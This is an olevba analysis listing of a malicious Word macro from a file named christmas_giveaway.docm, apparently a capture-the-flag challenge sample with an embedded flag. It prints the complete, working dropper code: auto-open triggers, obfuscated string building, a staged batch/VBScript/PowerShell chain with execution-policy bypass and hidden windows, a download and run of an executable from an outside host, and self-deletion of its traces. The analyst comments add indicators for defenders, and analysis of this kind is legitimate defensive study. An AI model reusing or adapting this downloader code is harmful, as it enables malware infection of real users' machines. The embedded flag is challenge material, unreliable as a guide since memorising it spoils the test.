olevba 0.60 on Python 3.9.8 - http://decalage.info/python/oletools
===============================================================================
FILE: christmas_giveaway.docm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Analyst summary (derived only from the macro text below):
'   * Entry points Auto_Open / AutoOpen / Workbook_Open all funnel into h().
'   * h() builds file names with Chr()/Asc() concatenation, apparently to keep
'     plain keywords out of the macro source, writes a .bat/.vbs/.ps1 chain
'     into a temp directory and starts the .bat with Shell(..., 0).
'   * Indicators worth hunting for (network indicators defanged):
'       - adobeacd-update.ps1 / .bat / .vbs under c:\Users\<user>\AppData\Local\Temp\
'       - adobeacd-updatexp.vbs and adobeacd-update.bat under c:\Windows\Temp\
'       - 444.exe in either temp directory
'       - hxxp://hiro-wish[.]com/js/bin.exe
'       - User-Agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) ... Safari/600.1.25"
'         sent from a Windows host
'       - process chain: Office app -> .bat -> cscript.exe -> powershell.exe
'         with "-ExecutionPolicy bypass -noprofile -file"
'   * Names assigned random-looking strings (ASDSA, ASKIEJ, ...) are never read
'     in the code visible here; they look like filler.

' Auto-run entry point; only forwards to h().
Sub Auto_Open()
    h
End Sub

' Main routine: stages the script chain on disk, launches it, then edits the
' visible document text.
Sub h()
    Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
    USER = Environ("username")
    ' Decoded file names: Chr(115) = "s", Chr(118) = "v".
    ' PST1 -> "adobeacd-update.ps1"
    PST1 = "adobeacd-update.p" + Chr(115) + "1"
    ' BART -> "adobeacd-update.bat"
    BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
    ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
    ' VBT1 -> "adobeacd-update.vbs"
    VBT1 = "adobeacd-update." + Chr(118) + "bs"
    ' VBTXP -> "adobeacd-updatexp.vbs"
    VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"
    ' MY_FILENDIR = .ps1, MY_FILEDIR = .bat, MY_FILDIR = .vbs, all in the
    ' current user's AppData\Local\Temp.
    MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
    ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
    MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
    MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
    ' Second set of paths, used only by the (winver <= 5.5) branch below.
    XPFILEDIR = "c:\Windows\Temp\" + VBTXP
    XPBARTFILEDIR = "c:\Windows\Temp\" + BART

    ' Remove copies left by an earlier run: clear file attributes, then delete.
    ' On Error Resume Next hides the failure when a file does not exist.
    On Error Resume Next
    SetAttr MY_FILENDIR, vbNormal
    If (Len(Dir(MY_FILENDIR)) <> 0) Then
        Kill MY_FILENDIR
    End If
    On Error Resume Next
    SetAttr MY_FILEDIR, vbNormal
    If (Dir(MY_FILEDIR) <> "") Then
        Kill MY_FILEDIR
    End If
    On Error Resume Next
    SetAttr MY_FILDIR, vbNormal
    If (Dir(MY_FILDIR) <> "") Then
        Kill MY_FILDIR
    End If
    On Error Resume Next
    SetAttr XPFILEDIR, vbNormal
    If (Dir(XPFILEDIR) <> "") Then
        Kill XPFILEDIR
    End If

    Dim FileNumber As Integer
    Dim FileNumb As Integer
    Dim FileNu As Integer
    Dim mttt As Integer
    Dim retVal As Variant
    'Dim winver As Integer
    ' All three handles are taken before any Open, so they presumably hold the
    ' same number; each file is opened and closed in turn further down.
    FileNumber = FreeFile
    FileNumb = FreeFile
    FileNu = FreeFile

    Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    ' First WMI query: builds SysReport, which is not read again in this listing.
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
    Next
    ' Second, identical WMI query: keeps the OS version string for branching.
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next
    ' Val() keeps the leading numeric part of the version string; 5.5 is the
    ' threshold between the two branches (presumably XP-era vs. later - confirm).
    winver = Val(winverstr)
    WaitFor (1)

    ' ---- Branch 1: winver > 5.5, stage under the user's Temp directory ----
    If (winver > 5.5) Then
        ' Stage 3 (.ps1): fetch a file to 444.exe, run it, then clean up.
        Open MY_FILENDIR For Output As #FileNumber
        ' $hashroot and $hash are written but no later generated line uses them.
        Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
        Print #FileNumber, "$hash = '0';"
        ' Decodes to: $down = New-Object System.Net.WebClient;
        Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
        ' Decodes to $url = hxxp://hiro-wish[.]com/js/bin.exe (defanged here).
        Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
        ' Download target: ...\AppData\Local\Temp\444.exe
        Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
        ' Fixed macOS Safari User-Agent on the request; a useful proxy-log
        ' pivot when the client is a Windows machine.
        Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
        ' Decodes to: $down.DownloadFile($url,$file);
        Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
        Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
        Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
        Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
        Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
        Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
        Print #FileNumber, "Start-Sleep -s 15;"
        ' Decodes to: cmd.exe /c '<user temp>\444.exe';  (runs the download)
        Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
        ' gci $vbsFilePath / $batFilePath / $psFilePath, then -bxor flips the
        ' Hidden attribute bit on each of the three staged scripts.
        Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
        Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
        Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
        Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
        Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
        Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
        ' Self-cleanup: the .vbs, .bat, 444.exe and the invoked script are
        ' removed, so file artefacts may be gone by the time of triage.
        Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
        Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
        Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
        Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
        Close #FileNumber

        ' Stage 2 (.vbs): starts PowerShell on the .ps1 written above.
        Open MY_FILDIR For Output As #FileNumb
        Print #FileNumb, "Dim dff"
        Print #FileNumb, "dff = 68"
        Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
        ' Decodes to: Set objFSO=CreateObject("Scripting.FileSystemObject")
        Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
        ' currentFile = "C:\Users\<user>\AppData\Local\Temp\adobeacd-update.ps1"
        Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
        ' Decodes to: Set objShell = CreateObject("Wscript.shell")
        Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
        ' Decodes to: objShell.Run "powerShell.exe -noexit -ExecutionPolicy
        ' bypass -noprofile -file " & currentFile,0,true
        ' (window style 0 = hidden; the command line is a good detection anchor).
        Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
        Close #FileNumb

        ' Stage 1 (.bat): ping is used as a short delay, then cscript.exe runs
        ' the .vbs.
        Open MY_FILEDIR For Output As #FileNu
        Print #FileNu, "@echo off"
        Print #FileNu, "ping 1.1.2.2 -n 2"
        Print #FileNu, "chcp 1251"
        ' Decodes to: cscript.exe "c:\Users\<user>\AppData\Local\Temp\adobeacd-update.vbs"
        Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
        Print #FileNu, "exit"
        Close #FileNu

        SetAttr MY_FILENDIR, vbNormal
        SetAttr MY_FILEDIR, vbNormal
        SetAttr MY_FILDIR, vbNormal
        WaitFor (1)
        ' Launch the .bat with window style 0 (hidden).
        retVal = Shell(MY_FILEDIR, 0)
    End If

    ' ---- Branch 2: winver <= 5.5, stage under c:\Windows\Temp ----
    If (winver <= 5.5) Then
        ' .bat: run the XP .vbs with cscript.exe, run c:\Windows\Temp\444.exe,
        ' then loop deleting the .vbs and the .bat itself until both are gone.
        Open XPBARTFILEDIR For Output As #FileNu
        Print #FileNu, "@echo off"
        Print #FileNu, "ping 1.1.2.2 -n 2"
        Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
        Print #FileNu, "ping 1.1.2.2 -n 2"
        Print #FileNu, "c:\Windows\Temp\444.exe"
        Print #FileNu, ":loop"
        Print #FileNu, "ping 1.1.2.2 -n 1"
        Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
        Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
        Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
        Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
        Print #FileNu, "exit"
        Close #FileNu
        WaitFor (2)
        ' mttt feeds the Chr(mttt - n) arithmetic in the CreateObject line below.
        mttt = 88
        ' Only FVpHoEqBKnhPO is typed As String; the other names on this Dim
        ' line are Variants.
        Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
        ' The five fragments below concatenate to a URL on host "elvesfactory"
        ' whose path is an HTB{...}-style string:
        '   "https://elvesfactory/HTB{Th1s_1s_4" & "_pr3s3nt_" & "3v3ryb0dy_"
        '   & "w4nts_f0r_" & "chr1stm4s}"
        HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
        cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
        fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
        fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
        ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
        FVpHoEqBKnhPO = Replace("christmas", "i", "1")
        FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

        ' XP .vbs: HTTP GET via XMLHTTP, body saved with ADODB.Stream to
        ' c:\Windows\Temp\444.exe.
        Open XPFILEDIR For Output As #FileNumber
        ' NOTE(review): the variable NAMES sit inside the string literal, so the
        ' generated .vbs receives the names, not the URL assembled above; in
        ' that script they would be undefined.
        Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
        ' strTecation = "c:\Windows\Temp\444.exe"
        Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
        ' NOTE(review): with mttt = 88 the Chr() run is Chr(34) X M L H T T P,
        ' so this emits  Set objXMLHTTP = CreateObject("MSXML2."XMLHTTP)  - the
        ' second quote lands mid-name and there is no closing quote, so the
        ' generated line looks malformed as written.
        Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
        Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
        Print #FileNumber, "objXMLHTTP.send() "
        Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
        Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
        Print #FileNumber, "objADOStream.Open "
        ' Type = 1 selects a binary stream.
        Print #FileNumber, "objADOStream.Type = 1"
        Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
        Print #FileNumber, "objADOStream.Position = 0 "
        Print #FileNumber, "objADOStream.SaveToFile strTecation "
        Print #FileNumber, "objADOStream.Close "
        Print #FileNumber, "Set objADOStream = Nothing "
        Print #FileNumber, "End if "
        Print #FileNumber, "Set objXMLHTTP = Nothing"
        ' objShell is created last in the generated script and never used there.
        Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
        Close #FileNumber
        WaitFor (1)
        ' Launch the XP .bat with window style 0 (hidden).
        retVal = Shell(XPBARTFILEDIR, 0)
    End If

    ' Document-body edits that run after staging.
    findTest
    secondTest
    ' Replace every occurrence of "<select>" with a space in all story ranges.
    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "<" & "sel" & "ect>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange
    ' NOTE(review): .Text is empty in this loop; possibly a tag-like literal
    ' lost when this page was extracted - confirm against the original sample.
    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = ""
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange
    ' Replace every occurrence of "<inbox>" with a space in all story ranges.
    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "<" & "in" & "box>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange
    ' NOTE(review): empty .Text again - same caveat as the second loop above.
    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = ""
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange
End Sub

' Busy-wait helper: loops on DoEvents until Timer reaches the target value.
' SngSec is declared Long despite its name, so the sum is stored as a Long.
Sub WaitFor(NumOfSeconds As Long)
    Dim SngSec As Long
    SngSec = Timer + NumOfSeconds
    Do While Timer < SngSec
        DoEvents
    Loop
End Sub

' Additional auto-run names; both forward to Auto_Open, so whichever name the
' host application fires on open, h() runs.
Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

' Finds firstTerm, then secondTerm, and deletes the document text between the
' two matches.
' NOTE(review): both terms are empty strings in this listing; they may be
' tag-like markers lost in extraction - confirm against the original sample.
Sub findTest()
    Dim firstTerm As String
    Dim secondTerm As String
    Dim rrtt As Range
    Dim selRange As Range
    Dim selectedText As String
    Set rrtt = ActiveDocument.Range
    firstTerm = ""
    secondTerm = ""
    ASKASAIEJ = "ask as8d j vnbnfghfthfth sad"
    With rrtt.Find
        .Text = firstTerm
        .MatchWholeWord = True
        .Execute
        ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad"
        ' Collapse to the end of the first match; the kept range starts there.
        rrtt.Collapse direction:=wdCollapseEnd
        Set selRange = ActiveDocument.Range
        selRange.Start = rrtt.End
        .Text = secondTerm
        .MatchWholeWord = True
        .Execute
        ASKSASADW = "asjldklas"
        ' Collapse to the start of the second match; the kept range ends there.
        rrtt.Collapse direction:=wdCollapseStart
        selRange.End = rrtt.Start
        selectedText = selRange.Delete
    End With
End Sub

' Same two-marker search as findTest, but instead of deleting the text between
' the matches it sets that text's font colour to black.
' NOTE(review): firstTerm/secondTerm are empty here too - same caveat.
' myRanget is declared but not used in the visible body.
Sub secondTest()
    Dim firstTerm As String
    Dim secondTerm As String
    Dim myRanget As Range
    Dim yytt As Range
    Dim selRanget As Range
    Dim selectedTextt As String
    Set yytt = ActiveDocument.Range
    firstTerm = ""
    secondTerm = ""
    ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad"
    With yytt.Find
        .Text = firstTerm
        .MatchWholeWord = True
        .Execute
        ASKIEJ = "ask as8d j vnbnfghfthfth sad"
        yytt.Collapse direction:=wdCollapseEnd
        ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad"
        Set selRanget = ActiveDocument.Range
        selRanget.Start = yytt.End
        .Text = secondTerm
        .MatchWholeWord = True
        .Execute
        ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad"
        yytt.Collapse direction:=wdCollapseStart
        selRanget.End = yytt.Start
        selectedTextt = selRanget
        selRanget.Font.Color = wdColorBlack
    End With
End Sub